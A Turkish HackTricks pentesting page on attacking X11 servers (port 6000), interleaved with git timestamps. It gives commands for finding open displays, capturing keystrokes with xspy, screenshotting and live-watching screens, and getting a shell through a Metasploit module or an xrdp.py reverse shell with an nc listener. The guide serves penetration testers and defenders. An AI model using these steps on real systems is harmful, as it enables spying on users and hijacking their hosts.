2024-04-07 03:13:19 +00:00
# 6000 - Pentesting X11
2022-04-28 16:01:33 +00:00
< details >
2024-04-07 03:13:19 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahramana öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ile!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-01-03 11:42:55 +01:00
2024-04-07 03:13:19 +00:00
* **Şirketinizi HackTricks'te reklamı nı zı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI** ](https://github.com/sponsors/carlospolop )'na göz atı n!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
2024-04-07 03:13:19 +00:00
* [**The PEASS Family'yi** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* **Bize katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n veya bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** takip edin.**
* **Hacking püf noktaları nı zı paylaşarak** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na PR göndererek katkı da bulunun.
2022-04-28 16:01:33 +00:00
< / details >
2024-04-07 03:13:19 +00:00
< figure > < img src = "../.gitbook/assets/image (377).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 10:28:45 +01:00
2024-02-10 18:14:16 +00:00
Deneyimli hackerlar ve ödül avcı ları ile iletişim kurmak için [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) sunucusuna katı lı n!
2023-02-27 10:28:45 +01:00
2024-04-07 03:13:19 +00:00
**Hackleme İçgörüleri**\
Hackleme heyecanı nı ve zorlukları nı inceleyen içeriklerle etkileşime geçin
2023-07-14 17:03:41 +02:00
2024-02-10 18:14:16 +00:00
**Gerçek Zamanlı Hack Haberleri**\
2024-04-07 03:13:19 +00:00
Hı zlı tempolu hackleme dünyası nda gerçek zamanlı haberler ve içgörülerle güncel kalı n
2023-07-14 17:03:41 +02:00
2024-02-10 18:14:16 +00:00
**En Son Duyurular**\
2024-04-07 03:13:19 +00:00
Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkı nda bilgilenin
2022-11-05 10:07:43 +01:00
2024-04-07 03:13:19 +00:00
**Bize katı lı n** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) ve bugün en iyi hackerlarla işbirliğine başlayı n!
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
## Temel Bilgiler
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
**X Window Sistemi** (X), UNIX tabanlı işletim sistemlerinde yaygı n olan çok yönlü bir pencereleme sistemidir. Grafik **kullanı cı arayüzleri (GUI'ler)** oluşturmak için bir çerçeve sağlar, bireysel programlar kullanı cı arayüzü tasarı mı nı ele alı r. Bu esneklik, X ortamı nda çeşitli ve özelleştirilebilir deneyimler sunar.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
**Varsayı lan port:** 6000
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
6000/tcp open X11
```
2024-04-07 03:13:19 +00:00
## Sı ralama
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
**Anonim bağlantı ** için kontrol edin:
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script x11-access -p < PORT > < IP >
msf> use auxiliary/scanner/x11/open_x11
```
2024-04-07 03:13:19 +00:00
#### Yerel Sı ralama
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
Kullanı cı ev dizinindeki ** `.Xauthority` ** dosyası , **yetkilendirme için X11 tarafı ndan kullanı lı r** . [**buradan** ](https://stackoverflow.com/a/37367518 ):
2023-12-29 00:56:54 -08:00
```bash
$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X
00000030: 041d ef ...
```
2024-04-07 03:13:19 +00:00
> MIT-sihirli-biskuvi-1: 128 bitlik bir anahtar ("bisküvi") oluşturulur, \~/.Xauthority dosyası na (veya XAUTHORITY çevresel değişkeninin işaret ettiği yere) depolanı r. İstemci bunu düz metin olarak sunar! sunucu, bu "bisküvi"nin bir kopyası na sahip olup olmadı ğı nı kontrol eder ve eğer öyleyse bağlantı izin verilir. anahtar DMX tarafı ndan oluşturulur.
2023-04-07 00:41:31 +00:00
{% hint style="warning" %}
2024-04-07 03:13:19 +00:00
**Bisküviyi kullanmak** için çevresel değişkeni ayarlamanı z gerekir: ** `export XAUTHORITY=/path/to/.Xauthority` **
2023-04-07 00:41:31 +00:00
{% endhint %}
2024-02-10 18:14:16 +00:00
#### Yerel Sorgulama Oturumu
2023-12-29 00:56:54 -08:00
```bash
2024-02-10 18:14:16 +00:00
$ w
23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12
2023-12-29 00:56:54 -08:00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session
```
2024-04-07 03:13:19 +00:00
Örnekte, `localhost:0` üzerinde xfce4-session çalı şı yordu.
2023-12-29 00:56:54 -08:00
2024-04-07 03:13:19 +00:00
## Bağlantı yı Doğrula
2020-07-15 15:43:14 +00:00
```bash
xdpyinfo -display < ip > :< display >
xwininfo -root -tree -display < IP > :< display > #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
2024-04-07 03:13:19 +00:00
## Keyloggin
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
[xspy ](http://tools.kali.org/sniffingspoofing/xspy ) klavye tuş vuruşları nı dinlemek için kullanı lı r.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Örnek Çı ktı :
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
2024-04-07 03:13:19 +00:00
## Ekran görüntüleri yakalama
2020-07-15 15:43:14 +00:00
```bash
xwd -root -screen -silent -display < TargetIP:0 > > screenshot.xwd
convert screenshot.xwd screenshot.png
```
2024-04-07 03:13:19 +00:00
## Uzak Masaüstü Görünümü
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Yol: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
./xrdp.py < IP:0 >
```
2024-02-10 18:14:16 +00:00
Yol: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html ](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html )
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
Öncelikle xwininfo kullanarak pencerenin kimliğini bulmamı z gerekiyor.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
```
**XWatchwin**
2024-04-07 03:13:19 +00:00
**Canlı izleme** için kullanmamı z gerekiyor
2020-07-15 15:43:14 +00:00
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
2024-02-10 18:14:16 +00:00
## Kabuk Al
2024-04-07 03:13:19 +00:00
Bu bölümde, X sunucuları na kabuk almak için kullanı labilecek bazı teknikler ele alı nmaktadı r.
2024-02-10 18:14:16 +00:00
```
msf> use exploit/unix/x11/x11_keyboard_exec
```
Diğer yol:
2024-04-07 03:13:19 +00:00
**Ters Kabuk (Reverse Shell):** Xrdp ayrı ca Netcat aracı lı ğı yla ters kabuk almayı da sağlar. Aşağı daki komutu yazı n:
2024-02-10 18:14:16 +00:00
```bash
./xrdp.py \<IP:0> – no-disp
```
Arayüzde **R-shell seçeneğini** görebilirsiniz.
Ardı ndan, yerel sisteminizde 5555 numaralı portta bir **Netcat dinleyici** başlatı n.
```bash
nc -lvp 5555
```
2024-04-07 03:13:19 +00:00
Sonra, IP adresinizi ve bağlantı noktanı zı **R-Shell** seçeneğine girin ve kabuk almak için **R-shell** üzerine tı klayı n
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
## Referanslar
2024-04-07 03:13:19 +00:00
2024-02-08 22:36:35 +01:00
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html ](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html )
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
2020-09-24 20:01:29 +00:00
2023-03-05 19:54:13 +00:00
## Shodan
2020-09-24 20:01:29 +00:00
* `port:6000 x11`
2022-04-28 16:01:33 +00:00
2024-04-07 03:13:19 +00:00
< figure > < img src = "../.gitbook/assets/image (377).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 17:03:41 +02:00
2024-04-07 03:13:19 +00:00
[**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) sunucusuna katı larak deneyimli hackerlar ve ödül avcı ları ile iletişim kurun!
2022-11-05 10:07:43 +01:00
2023-12-04 16:45:05 +01:00
**Hacking Insights**\
2024-02-10 18:14:16 +00:00
Hacking'in heyecanı nı ve zorlukları nı inceleyen içeriklerle etkileşime geçin
2023-02-27 10:28:45 +01:00
2024-02-10 18:14:16 +00:00
**Gerçek Zamanlı Hack Haberleri**\
2024-04-07 03:13:19 +00:00
Hı zlı tempolu hacking dünyası nda gerçek zamanlı haberler ve içgörülerle güncel kalı n
2023-02-27 10:28:45 +01:00
2024-02-10 18:14:16 +00:00
**En Son Duyurular**\
2024-04-07 03:13:19 +00:00
Yeni ödül avcı lı kları ve önemli platform güncellemeleri hakkı nda bilgilenin
2023-02-27 10:28:45 +01:00
2024-04-07 03:13:19 +00:00
**Bize katı lı n** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) ve bugün en iyi hackerlarla işbirliğine başlayı n!
2022-11-05 10:07:43 +01:00
2022-04-28 16:01:33 +00:00
< details >
2024-04-07 03:13:19 +00:00
< summary > < strong > Sı fı rdan kahraman olacak şekilde AWS hacklemeyi öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları :
2024-01-03 11:42:55 +01:00
2024-04-07 03:13:19 +00:00
* **Şirketinizi HackTricks'te reklamı nı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARINI** ](https://github.com/sponsors/carlospolop ) kontrol edin!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
2024-04-07 03:13:19 +00:00
* [**The PEASS Family'yi** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n veya bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** takip edin.**
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na katkı da bulunun.
2022-04-28 16:01:33 +00:00
< / details >